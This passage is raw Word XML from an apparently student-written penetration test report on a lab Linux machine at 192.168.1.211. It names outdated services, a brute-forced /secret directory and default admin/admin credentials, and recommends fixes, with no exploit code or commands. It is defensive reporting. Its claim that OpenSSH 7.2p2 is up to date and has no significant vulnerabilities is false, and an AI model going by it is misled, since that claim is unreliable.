        <w:spacing w:before="1"/>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="Requirements"/>
      <w:bookmarkStart w:id="7" w:name="_bookmark3"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE99E" w14:textId="283B3C52" w:rsidR="005D4D8F" w:rsidRDefault="00910646">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>his</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>penetration</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>report</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>following sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE99F" w14:textId="09136543" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="178"/>
        <w:ind w:hanging="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Overall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Summary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Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9A0" w14:textId="6ECE5E85" w:rsidR="005D4D8F" w:rsidRDefault="006304A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:ind w:hanging="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Full procedure</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>walkthrough</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>detailed</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>outline</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9A1" w14:textId="3A32D78A" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:ind w:hanging="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Each</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>finding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2"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="001D1E08">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-depth details,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>screenshots,</w:t>
      </w:r>
      <w:r w:rsidR="001D1E08">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9A3" w14:textId="23050F0F" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="001D1E08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:ind w:hanging="175"/>
        <w:sectPr w:rsidR="005D4D8F">
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1920" w:right="1280" w:bottom="1620" w:left="1300" w:header="0" w:footer="1436" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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-2"/>
        </w:rPr>
        <w:t>included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9A4" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9A5" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="321"/>
        <w:rPr>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9A6" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="542"/>
        </w:tabs>
        <w:ind w:left="542" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="High-Level_Summary"/>
      <w:bookmarkStart w:id="9" w:name="_bookmark4"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>High-Level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9A7" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="33"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9A8" w14:textId="26B529A4" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="130"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">I was tasked with performing an internal penetration test towards </w:t>
      </w:r>
      <w:r w:rsidR="00507EA7">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00445621">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00507EA7">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>192.168.1.211 on the Mercyhurst domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00507EA7">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack was to simulate the actions that a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00507EA7">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r w:rsidR="00EC3929">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> world</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EC3929">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> threat actor could take against the same IP.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> My overall objective was to evaluate the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB4D6B">
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00365260">
        <w:t xml:space="preserve">discover </w:t>
      </w:r>
      <w:r w:rsidR="00FB45A1">
        <w:t>vulnerable services running,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and exploit flaw</w:t>
      </w:r>
      <w:r w:rsidR="00FB45A1">
        <w:t>s to report back to the customer</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9A9" w14:textId="7BF35D9B" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="116" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="9"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>When</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>performing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB45A1">
        <w:t>the penetration test on this IP</w:t>
      </w:r>
      <w:r>
        <w:t>,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alarming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00FB45A1">
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> I was able to ident</w:t>
      </w:r>
      <w:r w:rsidR="009B2388">
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>ify</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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performing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 w:rsidR="009B2388">
        <w:t>initial reconnaissance on the IP</w:t>
      </w:r>
      <w:r>
        <w:t>,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 w:rsidR="00EB6E69">
        <w:t>identify multiple outdated/vulnerable programs running on the device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB6E69">
        <w:t xml:space="preserve">By using </w:t>
      </w:r>
      <w:r w:rsidR="007A7F50">
        <w:t>exploits on the vulnerable services that were running, I was able to gain root access (</w:t>
      </w:r>
      <w:r w:rsidR="009D7E18">
        <w:t>the equivalent of administrator access) on the target machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D7E18">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00A2727A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> open ports and services running on them are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9AA" w14:textId="5A14796D" w:rsidR="005D4D8F" w:rsidRPr="007515D3" w:rsidRDefault="00A2727A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
        <w:ind w:hanging="175"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:t>192.168.</w:t>
      </w:r>
      <w:r w:rsidR="009B11A4">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B11A4">
        <w:t>211</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00220239">
        <w:t>Linux Virtual Machine</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D627F" w14:textId="2E146155" w:rsidR="007515D3" w:rsidRPr="00E7362D" w:rsidRDefault="00CE1771" w:rsidP="007515D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Open Ports/</w:t>
      </w:r>
      <w:r w:rsidR="007515D3">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Services </w:t>
      </w:r>
      <w:r w:rsidR="00E7362D">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>running on 192.168.1.211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD1B9B" w14:textId="48B065F2" w:rsidR="00E7362D" w:rsidRDefault="00CE1771" w:rsidP="00E7362D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 21 (ftp) running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.3.3c</w:t>
      </w:r>
      <w:r w:rsidR="00FA2299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297A46F" w14:textId="33FDA2B4" w:rsidR="00CE1771" w:rsidRDefault="001A2E34" w:rsidP="00E7362D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
      <w:r>
        <w:t>Port 22 (ssh) running OpenSSH 7.2p2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8CBAD" w14:textId="4980CC8D" w:rsidR="001A2E34" w:rsidRDefault="001A2E34" w:rsidP="00E7362D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 80 (http) Apache </w:t>
      </w:r>
      <w:r w:rsidR="00710231">
        <w:t>httpd 2.4.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4E7B3" w14:textId="10EC1DF9" w:rsidR="00FA2299" w:rsidRDefault="00FA2299" w:rsidP="00FA2299">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.3.3c </w:t>
      </w:r>
      <w:r w:rsidR="003B19AE">
        <w:t xml:space="preserve">is a file transfer protocol that is extremely out of date. </w:t>
      </w:r>
      <w:r w:rsidR="00A23528">
        <w:t xml:space="preserve">In my testing, I was able to easily exploit the vulnerable and </w:t>
      </w:r>
      <w:r w:rsidR="00D970F5">
        <w:t>outdated</w:t>
      </w:r>
      <w:r w:rsidR="00A23528">
        <w:t xml:space="preserve"> software to gain administrator access on the target machine.</w:t>
      </w:r>
      <w:r w:rsidR="00D970F5">
        <w:t xml:space="preserve"> (See more in methodologies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E71B02" w14:textId="77777777" w:rsidR="00D970F5" w:rsidRDefault="00D970F5" w:rsidP="00FA2299">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB229BF" w14:textId="03DA5114" w:rsidR="00D970F5" w:rsidRDefault="00BA2EAC" w:rsidP="00FA2299">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="176"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OpenSSH </w:t>
      </w:r>
      <w:r w:rsidR="00476065">
        <w:t xml:space="preserve">7.2p2 has no significant security vulnerabilities. It is up to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00476065">
        <w:t>date</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00476065">
        <w:t xml:space="preserve"> and I was not able to find any</w:t>
      </w:r>
      <w:r w:rsidR="00250E46">
        <w:t xml:space="preserve"> security</w:t>
      </w:r>
      <w:r w:rsidR="00476065">
        <w:t xml:space="preserve"> flaws during my testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9AF" w14:textId="75CC92D6" w:rsidR="005D4D8F" w:rsidRDefault="00294DFE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="233"/>
      </w:pPr>
      <w:r>
        <w:t>The Apache server running has issues that need to be addressed. At first glance</w:t>
      </w:r>
      <w:r w:rsidR="00AD1049">
        <w:t>, there does not seem to be any significant website running. However, I was able to run a brute forcing tool that discovered a secret directory running</w:t>
      </w:r>
      <w:r w:rsidR="000D0310">
        <w:t xml:space="preserve"> and through methods that will be discussed further</w:t>
      </w:r>
      <w:r w:rsidR="00250E46">
        <w:t>, gain admin access on the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9B0" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Recommendations"/>
      <w:bookmarkStart w:id="11" w:name="_bookmark5"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4266DDD8" w14:textId="414F2C96" w:rsidR="00744D2A" w:rsidRDefault="00BE276F" w:rsidP="00744D2A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="352" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="112" w:right="131" w:firstLine="5"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With these vulnerabilities being found, I highly recommend that </w:t>
      </w:r>
      <w:r w:rsidR="001F2EB2">
        <w:t>you immediately update your ftp service</w:t>
      </w:r>
      <w:r w:rsidR="00F9792D">
        <w:t xml:space="preserve"> to a more recent</w:t>
      </w:r>
      <w:r w:rsidR="00DE502C">
        <w:t xml:space="preserve"> and secure</w:t>
      </w:r>
      <w:r w:rsidR="00F9792D">
        <w:t xml:space="preserve"> version</w:t>
      </w:r>
      <w:r w:rsidR="001F2EB2">
        <w:t xml:space="preserve">. The method I used to gain admin access is commonly known and exploiting the vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="009E74F0">
        <w:t>requires only a couple clicks and very little hacking knowledge.</w:t>
      </w:r>
      <w:r w:rsidR="00754CCE">
        <w:t xml:space="preserve"> In a</w:t>
      </w:r>
      <w:r w:rsidR="0095105D">
        <w:t>ddition to the FTP service, some changes also need to be made to the Apache website running on the target machine.</w:t>
      </w:r>
      <w:r w:rsidR="00C740BB">
        <w:t xml:space="preserve"> First, if the </w:t>
      </w:r>
      <w:r w:rsidR="009D1BE9">
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="00C740BB">
        <w:t xml:space="preserve"> on the machine is not being used, it </w:t>
      </w:r>
      <w:r w:rsidR="00113B53">
        <w:t xml:space="preserve">would be smart to take it offline so that it is not a target to begin with. </w:t>
      </w:r>
      <w:r w:rsidR="00497FC5">
        <w:t>If the website is being used, I would advise changing the 192.168.1.211/secret directory to something more random</w:t>
      </w:r>
      <w:r w:rsidR="00F07B23">
        <w:t xml:space="preserve"> to prevent a brute force tool from finding the directory</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F07B23">
        <w:t xml:space="preserve"> Next, </w:t>
      </w:r>
      <w:r w:rsidR="00726603">
        <w:t xml:space="preserve">When the website redirects to </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="009D1BE9" w:rsidRPr="00150CFD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vtcsec/secret</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002F46FB">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F46FB">
        <w:t>vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F46FB">
        <w:t xml:space="preserve"> is added to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F46FB">
        <w:lastRenderedPageBreak/>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F46FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002449DE">
        <w:t>machine as</w:t>
      </w:r>
      <w:r w:rsidR="002648AD">
        <w:t xml:space="preserve"> a host, the attacker can then access the hidden site and attempt to login as the owner. The admin login to the site </w:t>
      </w:r>
      <w:r w:rsidR="00242B35">
        <w:t xml:space="preserve">was username: admin, password: admin. These default credentials are easily guessed by attackers and </w:t>
      </w:r>
      <w:r w:rsidR="002449DE">
        <w:t xml:space="preserve">need to be changed to something more complex that cannot be guessed.  Lastly, an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002449DE">
        <w:t>update</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002449DE">
        <w:t xml:space="preserve"> schedule needs to be created to ensure that services running on machines are always the most secure and up-to</w:t>
      </w:r>
      <w:r w:rsidR="00481F3D">
        <w:t>-date versions. This will prevent common vulnerabilities from occurring on machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FFF30" w14:textId="77777777" w:rsidR="00744D2A" w:rsidRDefault="00744D2A" w:rsidP="00744D2A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
